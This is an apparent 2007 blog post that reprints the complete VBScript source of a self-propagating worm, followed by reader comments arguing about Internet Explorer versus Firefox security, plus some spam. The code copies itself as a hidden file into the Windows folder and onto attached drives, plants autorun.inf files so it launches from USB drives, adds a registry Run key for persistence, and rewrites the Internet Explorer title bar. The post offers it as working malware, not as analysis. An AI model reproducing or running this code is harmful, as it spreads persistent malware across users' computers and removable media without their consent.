«
»
 

Bad Kung Fu

This is the source code for the “worm” that changes your IE’s title bar to “TAGA LIPA ARE”. How many people still use IE anyway?

'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519",winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Source: PinoyPC

This entry was posted on Wednesday, April 11th, 2007 at 21.30.39 and is filed under Software/Code, Techitude, foo, bar and h4xx1ng. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

View Comments to “Bad Kung Fu”

  1. jupi Says:
    April 13th, 2007 at 09.05.18

    sad to say medyo marami parin gumagamit ng IE lalo na ung mga hinde masyado nagiinternet at di bihasa sa computer. gaya ng tita ko, kuya ni kai, pinsan ko, mga nakikita ko comp shop minsan, atbp. di kasi nila maintindihan mag download download pa, nahahassle ata sila sa ganon, tuturuan mo di gagawin :/, mas gusto nila nandun na wala ng gagawin pa which is IE.

  2. jploh Says:
    April 13th, 2007 at 10.07.49

    So true. Yung cafe nga sa Boracay walang Firefox e. Kaya tuwing uupo ako, kelangan ko pa magdownload. Where’s portable apps when you need it?

  3. Anonymous Visitor Says:
    April 14th, 2007 at 09.02.17

    Oh really! As far as I know Microsoft Internet Explorer is far more secured compared to that of Mozilla… Mozilla Firefox’s pop up blocker fails most of the time.

    Just visit his link http://mywebpages.comcast.net/SupportCD/FirefoxMyths.html

  4. jploh Says:
    April 14th, 2007 at 10.40.32

    Haha! Okay. May I suggest rereading this whole page and look for the part wher I said that Firefox is more secure than IE? You’re overreacting.

    On the other hand, it could be true (this post proves how easy it is to write a worm for IE/Windows). Can you write something like this for Firefox? Please, oh please do and prove yourself right.

  5. Anonymous Visitor Says:
    April 16th, 2007 at 07.24.51

    Check this out…

    http://setiweb.ssl.berkeley.edu/beta/forum_thread.php?id=892

    http://www.virus.org/news/system-security/nasty-little-firefox-hole-discovered.html

  6. jploh Says:
    April 16th, 2007 at 11.13.11

    You get to show only two? Not bad for Firefox. I can give you a long list of IE vulnerabilities. If include ActiveX holes, you wouldn’t be able to digest it all. Compare the two pages

    http://secunia.com/product/12434/?task=statistics
    http://secunia.com/product/12366/?task=statistics

    Where’s the worm that I asked you to replicate? Can’t make one?

  7. iRant » Blog Archive » Taga-Lipa Says:
    July 15th, 2007 at 10.55.49

    [...] that Taga-Lipa “worm”? Somebody modified it and sent it back into the wild with a new message. I don’t know about [...]

  8. Alexis Pandaan Says:
    November 15th, 2007 at 21.11.43

    What is the source code of Baguio Strawberry virus?

  9. jploh Says:
    November 16th, 2007 at 00.29.58

    If I told you, I’d have to kill you.

  10. shox t13men Says:
    June 11th, 2010 at 03.31.43

    Hhe article's content rich variety which make us move for our mood after reading this article. surprise, here you will find what you want! Recently, I found some wedsites which commodity is colorful of fashion. Such as xxxxxxxx that worth you to see. Believe me these websites won’t let ustomemories.com you down.

  11. bluehost vs dreamhost Says:
    September 6th, 2010 at 00.55.59

    Thanks Bouhammer for the link. Great interview

Leave a Reply

blog comments powered by Disqus
Locations of visitors to this page
De La Salle Canlubang Top Sites top blogs Best blogs on the Web: all about WWW